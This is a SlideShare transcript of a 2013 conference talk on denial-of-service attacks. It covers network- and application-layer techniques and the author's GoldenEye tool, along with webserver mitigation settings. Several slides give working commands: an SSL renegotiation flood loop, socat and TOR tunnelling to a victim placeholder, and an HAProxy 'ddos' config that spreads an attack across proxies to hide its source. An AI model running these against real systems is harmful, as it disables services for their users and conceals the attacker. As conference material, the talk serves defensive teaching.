Super Effective Denial of Service Attacks

4,720 views
4,635 views

Published on

Talk given on October 16th at Latinoware 2013 - Foz do Iguaçu - Brazil

This talk gave an introduction on denial of service attacks, going trough attacks in layer 3 to layer 7, introduced the concept of using load-balancing software for attacks with multiple IPs (Jericho Attack) and introduced the GoldenEye tool written in python and Android (Java), as well as a brief introduction to mitigate layer 7 denial-of-service attacks on most popular webservers.

Presentation Video (pt_BR) @ FISL 2014: https://www.youtube.com/watch?v=ozk0HiMjVNY

Published in: Technology, News & Politics
0 Comments
4 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
4,720
On SlideShare
0
From Embeds
0
Number of Embeds
457
Actions
Shares
0
Downloads
167
Comments
0
Likes
4
Embeds 0
No embeds

No notes for slide
  • {}
  • Super Effective Denial of Service Attacks

    1. 1. super effective denial of service attacks Jan Seidl
    2. 2. $ whoami Full Name: Jan Origin: Rio de Seidl Janeiro, RJ – Brazil Work: ● Technical Coordinator @ TI Safe ● ● OpenSource contributor for: PEV, Logstash ● ● Codes and snippets @ github.com/jseidl ● Features: ● UNIX Evangelist/Addict/Freak (but no fanboy!) ● ● Python and C lover ● ● Coffee dependent ● ● Hates printers and social networks ● ● Proud DC Labs Member ● Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    3. 3. agenda 0x0 0x1 0x2 0x3 0x4 0x5 0x6 0x7 0x8 0x9 0xA Introduction to Denial-of-Service Background: Layer 3 attacks Attacking Layer 7: Fundamentals Attacking Layer 7: Vectors & Tools WebServer DoS Mitigation 101 Proxies (SOCKS/TOR) and Layer 7 attacks Jericho Attack Technique: Load-balancing attacks XSS D/DoS Size doesn't matter: Mobile-launched Denial-of-Service Demo/Video: GoldenEye MdoS Android Tool Questions? Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    4. 4. Introduction to Denial-of-Service What is denial of service? Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    5. 5. Introduction to Denial-of-Service What is denial of service? A denial-of-service attack (...), is an attempt to make a machine or network resource unavailable to its intended users. Source: Wikipedia/en_US Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    6. 6. Introduction to Denial-of-Service Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    7. 7. Introduction to Denial-of-Service Result? Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    8. 8. Introduction to Denial-of-Service Result? Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    9. 9. Introduction to Denial-of-Service Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    10. 10. Introduction to Denial-of-Service Symptoms Oddly low performance Unavailability of given resource Unavailability of all resources Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    11. 11. Introduction to Denial-of-Service Recent Cases Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    12. 12. Introduction to Denial-of-Service http://money.cnn.com/2012/09/27/technology/bank-cyberattacks/index.html Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    13. 13. Introduction to Denial-of-Service Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    14. 14. Introduction to Denial-of-Service http://www.datacenterknowledge.com/archives/2009/08/06/twitter-is-latest-victim-in-series-of-attacks/ Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    15. 15. Introduction to Denial-of-Service http://nakedsecurity.sophos.com/2012/04/07/anonymous-attacks-home-office/ Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    16. 16. Introduction to Denial-of-Service http://usatoday30.usatoday.com/tech/news/story/2012-07-19/hactivism-anonymous-attacks/56464792/1 Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    17. 17. Introduction to Denial-of-Service http://olhardigital.uol.com.br/negocios/digital_news/noticias/ataques-ddos-cresceram-70-em-2012,-dizpesquisa Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    18. 18. Introduction to Denial-of-Service Targets (OSI layer) Network (Layer 3) Bandwidth consumption Application (Layer 7) Application or operating system resources consumption Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    19. 19. Introduction to Denial-of-Service Network (Layer 3) Bandwidth consumption Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    20. 20. Background: Layer 3 attacks Popular Attacks Ping Flood (…) is a simple denial-of-service attack where the attacker overwhelms the victim with ICMP Echo Request (ping) packets (...) The attacker hopes that the victim will respond with ICMP Echo Reply packets, thus consuming both outgoing bandwidth as well as incoming bandwidth. Source: Wikipedia/en_US Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    21. 21. Background: Layer 3 attacks Popular Attacks Smurf Attack Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    22. 22. Background: Layer 3 attacks Popular Attacks Smurf Attack Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    23. 23. Background: Layer 3 attacks Popular Attacks Smurf Attack Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    24. 24. Background: Layer 3 attacks Popular Attacks SYN Flood Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    25. 25. Background: Layer 3 attacks Popular Attacks SYN Flood Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    26. 26. Background: Layer 3 attacks Popular Attacks Teardrop Attack “When the sum of the offset and size of one fragmented packet differ from that of the next fragmented packet, the packets overlap, and the server attempting to reassemble the packet can crash, especially if it is running an older operating system that has this vulnerability.” http://www.juniper.net/techpubs/software/junos-es/junos-es93/junos-es-swconfigsecurity/understanding-teardrop-attacks.html Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    27. 27. Background: Layer 3 attacks Popular Attacks Teardrop Attack Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    28. 28. Background: Layer 3 attacks Popular Attacks Teardrop Attack Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    29. 29. Background: Layer 3 attacks Popular Attacks Teardrop Attack Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    30. 30. Background: Layer 3 attacks Popular Attacks Teardrop Attack Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    31. 31. Attacking Layer 7: Fundamentals Application (Layer 7) Application or operating system resources consumption Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    32. 32. Attacking Layer 7: Fundamentals Focus Layer 3 Layer 7 Exhaust bandwidth Exhaust application or operating system keyresources Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    33. 33. Attacking Layer 7: Fundamentals Stealthness Layer 3 Layer 7 High network noise (noisy attack) Low network noise, might emulate legit requests Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    34. 34. Attacking Layer 7: Fundamentals Efficiency Layer 3 Layer 7 Requires lot of participants for significant outage. May be blocking by sparring Sometimes only one machine can cause damage. Difficult to block Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    35. 35. Attacking Layer 7: Fundamentals Mitigation Layer 3 Layer 7 Large link, connectionlimiting, rate-limiting, sparring ? Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    36. 36. Attacking Layer 7: Fundamentals Layer 7 attacks targets Intense CPU, Disk I/O & Swapping operations, long/slow/complex queries Finite application resources: Maximum Sockets Limits, Maximum Memory Limits, Disk space etc Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    37. 37. Attacking Layer 7: Vectors & Tools Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    38. 38. Attacking Layer 7: Vectors & Tools Intense CPU usage SSL Renegotiation / SSL Handshake Attack 15% more processing power needed on server than on client to establish handshake. On the wild since 2003. Still affects most implementations. Found by THC group (ww.thc.org) in 2011 Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    39. 39. Attacking Layer 7: Vectors & Tools Intense CPU usage SSL Renegotiation / SSL Handshake Attack Tool: THC-SSL-DOS <http://www.thc.org/thc-ssl-dos/> - or thc­ssl­dosit() { while :; do (while :; do echo R;  done) | openssl s_client ­connect 127.0.0.1:443  2>/dev/null; done } for x in `seq 1 100`; do thc­ssl­dosit & done Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    40. 40. Attacking Layer 7: Vectors & Tools Intense CPU usage SSL Renegotiation / SSL Handshake Attack Affects any TLS/SSL secured protocol: HTTPS, SMTPS, POP3S, Database secure ports etc Mitigation? Turning off SSL renegotiation might help, but not solve SSL accelerators might help, but also don't 100% solve IPTables mitigation http://vincent.bernat.im/en/blog/2011-ssl-dos-mitigation.html Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    41. 41. Attacking Layer 7: Vectors & Tools Intense CPU usage Apache Range Header Attack Parallel requests of small GZIP'ed content parts Forces the webserver to perform several parallel compression operations = high load Discovered in 2011 (CVE-2011-3192) Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    42. 42. Attacking Layer 7: Vectors & Tools Intense CPU usage Apache Range Header Attack Tools: killapache.pl < http://seclists.org/fulldisclosure/2011/Aug/175> Slowhttptest <http://code.google.com/p/slowhttptest/> Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    43. 43. Attacking Layer 7: Vectors & Tools Intense CPU usage Apache Range Header Attack Mitigation: SetEnvIf or mod_rewrite (ref: http://httpd.apache.org/security/CVE-2011-3192.txt) Use a WAF (Web Application Firewall) Update Apache to version 2.2.21 or greater Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    44. 44. Attacking Layer 7: Vectors & Tools Connection slots abuse HTTP Slow Attacks Slow Headers, Slow Post, Slow Read Read or send data in small chunks, with interval between reads / writes. Waiting for the full request is part of the Web Server's nature Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    45. 45. Attacking Layer 7: Vectors & Tools Connection slots abuse HTTP Slow Attacks Slow Headers: send request headers 'Slowly' Slow Post: send request post body (post data) 'Slowly' Slow Read: Small TCP window size to force slow response reading Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    46. 46. Attacking Layer 7: Vectors & Tools Connection slots abuse HTTP Slow Attacks Slow Headers: send request headers 'Slowly' GET / HTTP/1.1 rn /* sleep(1) */ Connection: keep-alive rn /* sleep(1) */ ... Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    47. 47. Attacking Layer 7: Vectors & Tools Connection slots abuse HTTP Slow Attacks Slow Post: send request post body (post data) 'Slowly' Content-Type: application/x-www-form-urlencoded Content-Length: 512 Accept: text/html;q=0.9,text/plain;q=0.8 foo=bar /* sleep(1) */ bar=baz /* sleep(1) */ baz=foo /* sleep(1) */ ... Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    48. 48. Attacking Layer 7: Vectors & Tools Connection slots abuse HTTP Slow Attacks Slow Read: Small TCP window size to force slow response reading /* pseudocode */ int len = 1; while (data = read(sock, buffer, len)) { sleep(5); … } Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    49. 49. Attacking Layer 7: Vectors & Tools Connection slots abuse HTTP Slow Attacks Tools: Slow Headers: Slowloris, slowhttptest, OWASP HTTP Post Tool Slow Post: RUDY, slowhttptest, OWASP HTTP Post Tool Slow Read: slowhttptest Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    50. 50. Attacking Layer 7: Vectors & Tools Connection slots abuse HTTP Slow Attacks - Mitigation: Slow Headers: request timeout (apache's mod_reqtimeout), WAF Slow Post: request timeout, WAF Slow Read: Disable pipelining and oddly slow window sizes, limit maximum request request time, WAF Good article on slow attacks mitigation https://community.qualys.com/blogs/securitylabs/2011/11/02 /how-to-protect-against-slow-http-attacks Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    51. 51. Attacking Layer 7: Vectors & Tools Connection slots abuse HTTP KeepAlive + NoCache Keep connections open and force cache regeneration. First POC: HULK – HTTP Unbearable Load King Created on May 2012 by Barry Shteiman. <http://www.sectorix.com/2012/05/17/hulk-web-server-dos-tool/> Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    52. 52. Attacking Layer 7: Vectors & Tools Connection slots abuse HTTP KeepAlive + NoCache: HULK Highly effective against IIS, Apache & Reverse Proxies Caveat: Python, Urllib2 → Always sends headers on the same order Spiderlabs: modsecurity rule to mitigate URLLib attacks (Hulk) (http://blog.spiderlabs.com/2012/05/hulk-vs-thor-applicationdos-smackdown.html) Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    53. 53. Attacking Layer 7: Vectors & Tools Randomization FTW! Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    54. 54. Attacking Layer 7: Vectors & Tools Connection slots abuse HTTP KeepAlive + NoCache + Randomness: GoldenEye ● ● ● ● Author: Me! :) Initially born as a Hulk fork due to its fingerprinting weakness ● ● Transformed further into a new independent HTTP DoS Tool Born to test WAF blocking abilities under random and semi-natural payloads Available at https://github.com/jseidl/GoldenEye Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    55. 55. Attacking Layer 7: Vectors & Tools Connection slots abuse HTTP KeepAlive + NoCache + Randomness: GoldenEye Main Features: GET, POST or Random HTTP methods Random headers quantity Random Headers content with legit values as per RFC Better random block function to avoid fingerprinting Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Hackers to Hackers Conference 2012 – São Paulo, Brasil Hackers to Hackers Conference 2012 – São Paulo, Brasil
    56. 56. Attacking Layer 7: Vectors & Tools Mitigation Granular page permissions Filter POST where not needed Filter querystring parameters where not needed ProxyCache Use caching proxies (ex: Varnish) and disable cache reload KeepAlive e TimeOuts Tune KeepAlive, TimeOut & KeepAliveTimeOut (Apache) and equivalent in other webservers Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Hackers to Hackers Conference 2012 – São Paulo, Brasil Hackers to Hackers Conference 2012 – São Paulo, Brasil
    57. 57. WebServer DoS Mitigation 101 Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    58. 58. WebServer DoS Mitigation 101 Apache LimitRequestFields, LimitRequestFieldSize, LimitRequestBody, LimitRequestLine, LimitXMLRequestBody, TimeOut, KeepAliveTimeOut, ListenBackLog, MaxRequestWorkers [core] RequestReadTimeout [mod_reqtimeout] Source: https://community.qualys.com/blogs/securitylabs/2011/11/02/howto-protect-against-slow-http-attacks Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    59. 59. WebServer DoS Mitigation 101 Nginx client_max_body_size, client_body_buffer_size, client_header_buffer_size, large_client_header_buffers, client_body_timeout, client_header_timeout [core] Modules: HttpLimitReqModule, HttpLimitZoneModule Source: https://community.qualys.com/blogs/securitylabs/2011/11/02/howto-protect-against-slow-http-attacks Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    60. 60. WebServer DoS Mitigation 101 IIS 6 & 7 IIS 6: connectionTimeout, HeaderWaitTimeout, MaxConnections IIS 7: <RequestLimits> maxAllowedContentLength, maxQueryString, maxUrl <headerLimits> <Limits>/<WebLimits> connectionTimeout, headerWaitTimeout, minBytesPerSecond Source: https://community.qualys.com/blogs/securitylabs/2011/11/02/howto-protect-against-slow-http-attacks Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    61. 61. WebServer DoS Mitigation 101 USE A WEB APPLICATION FIREWALL (WAF) Modsecurity (Apache / Nginx) http://www.modsecurity.org/ NAXSI (Nginx) http://code.google.com/p/naxsi/ Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    62. 62. Proxies and Layer 7 attacks Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    63. 63. Proxies and Layer 7 attacks Layer 3 Layer 7 Bad to attack through proxies as they usually have low bandwidth and you might get banned from them Requires low bandwidth Low network noise Not degraded by low output Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    64. 64. Proxies and Layer 7 attacks Why use proxies in HTTP attacks? Simple answer     Geographic location at your will     Different source IPs Can provide high anonymity Largely available on the internet Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    65. 65. Proxies and Layer 7 attacks Attack pivoting by proxies Tool: Socat: Multipurpose Relay http://www.dest-unreach.org/socat/ Also with SSL support: HTTPS, IMAPS, POPS, LDAPS Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    66. 66. Proxies and Layer 7 attacks Attack pivoting by proxies: Regular Proxies # socat TCP4­LISTEN:80  PROXY:<PROXY_IP>:<VICTIM_IP>:80,proxyport=<PROXY_PORT> # echo “127.0.0.1 <VICTIM_HOST>” >> /etc/hosts # ./goldeneye.py http://<VICTIM_HOST>/index.php ­t 1000  ­m get Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    67. 67. Proxies and Layer 7 attacks Attack pivoting by proxies: TOR # socat TCP4­LISTEN:80,fork  SOCKS4A:localhost:<VICTIM_IP>:80,socksport=9052   # echo “127.0.0.1 <VICTIM_HOST>” >> /etc/hosts # ./goldeneye.py http://<VICTIM_HOST>/index.php ­t 1000  ­m get Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    68. 68. Proxies and Layer 7 attacks Bônus: Multi-TOR The TOR client supports spawning as many instances and opening as many circuits as necessary. tor ­­RunAsDaemon 1 ­­CookieAuthentication 0  ­­HashedControlPassword "pwd" ­­ControlPort 4444  ­­PidFile torN.pid ­­SocksPort 5090 ­­DataDirectory  data/torN Tool: Multi-TOR https://github.com/jseidl/Multi-TOR/ EX: ./multi-tor.sh 5 # Opens 5 TOR instances Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    69. 69. Proxies and Layer 7 attacks Mitigating TOR with TORBlock Blocking TOR-sourced access TORBlock: IPTables-based blocking Tool: https://github.com/jseidl/torblock Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    70. 70. Load Balancing Attacks Meet Jericho Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    71. 71. Load Balancing Attacks Starring: HAProxy “The Reliable, High Performance TCP/HTTP Load Balancer” REQUEST → HAPROXY → { SERVER A, SERVER B, SERVER C } Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    72. 72. Load Balancing Attacks 'Load-balanced' attacks anatomy Attacker: 1. Open lots of socat tunnels to the victim, each one from a different proxy (regular, TOR or both) 2. Put local port addresses (socat'ed ones) on HAProxy 3. Place victim's domain on /etc/hosts 4. Attack normally from your favorite tool Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    73. 73. Load Balancing Attacks 'Load-balanced' attacks anatomy listen ddos 0.0.0.0:80 mode tcp balance roundrobin server inst1 localhost:8080 server inst2 localhost:8081 server inst3 localhost:8082 server inst4 localhost:8083 … Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    74. 74. Load Balancing Attacks 'Load-balanced' attacks anatomy Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    75. 75. Load Balancing Attacks 'Load-balanced' attacks anatomy Proxy 1 Proxy 2 Attacker HAProxy Proxy 3 Proxy 4 Victim Proxy 5 Proxy 6 Proxy 7 Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
    76. 76. Load Balancing Attacks 'Load-balanced' attacks anatomy Super Effective Denial-of-Service Attacks. SEIDL, Jan Super Effective Denial-of-Service Attacks. SEIDL, Jan Latinoware/2013 – Foz do Iguaçú, Brazil Latinoware/2013 – Foz do Iguaçú, Brazil
